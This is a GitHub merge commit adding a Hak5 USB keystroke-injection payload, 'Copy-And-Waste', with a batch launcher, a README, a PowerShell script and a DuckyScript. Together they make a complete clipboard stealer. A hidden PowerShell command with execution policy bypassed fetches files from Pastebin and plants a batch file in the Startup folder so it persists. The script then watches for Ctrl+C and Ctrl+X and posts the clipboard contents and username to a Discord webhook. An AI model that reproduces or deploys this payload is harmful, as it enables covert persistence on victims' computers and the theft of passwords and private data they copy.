Merge pull request #546 from atomiczsec/master

New Payload - Copy-And-Waste
pull/554/head
hak5glytch 2022-10-09 11:57:16 -06:00 committed by GitHub
commit 8f19915a5f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 175 additions and 0 deletions

View File

@ -0,0 +1,3 @@
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause

View File

@ -0,0 +1,119 @@
<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png" width="200">
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Copy+And+Waste!+😈&center=true&size=30">
</a>
</h1>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Copy-And-Waste
A payload to exfiltrate clipboard contents
## Description
This payload uses iwr to download 2 files
* I.bat
* c.ps1
**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup
**c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click
Then the contents will then be sent to the discord webhook for viewing pleasure
For killing the script press both Ctrl buttons at the same time [It will resume at reboot]
## Getting Started
### Dependencies
* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Device will download both files and place them in proper directories to then run the script
```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here:
[atomiczsec](https://github.com/atomiczsec) &
[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<h2 align="center">📱 My Socials 📱</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
</a>
<br>YouTube
</td>
<td align="center" width="96">
<a href="https://twitter.com/atomiczsec">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
</a>
<br>Twitter
</td>
<td align="center" width="96">
<a href="https://discord.gg/MYYER2ZcJF">
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
</a>
<br>I-Am-Jakoby's Discord
</td>
</tr>
</table>
</div>
<p align="right">(<a href="#top">back to top</a>)</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
<p align="right">(<a href="#top">back to top</a>)</p>

View File

@ -0,0 +1,36 @@
Add-Type -AssemblyName WindowsBase
Add-Type -AssemblyName PresentationCore
function dischat {
[CmdletBinding()]
param (
[Parameter (Position=0,Mandatory = $True)]
[string]$con
)
$hookUrl = 'YOUR DISCORD WEBHOOK'
$Body = @{
'username' = $env:username
'content' = $con
}
Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
}
dischat (get-clipboard)
while (1){
$Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
$Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
$cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
$xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
else {continue}
}

View File

@ -0,0 +1,17 @@
REM Title: Copy-And-Waste
REM Author: atomiczsec & I am Jakoby
REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
REM Target: Windows 10, 11
DELAY 2000
GUI
DELAY
STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
ENTER
REM Remember to replace the link with your pastebin shared link for the intended files to download
REM Also remember to put in your discord webhook in c.ps1
REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH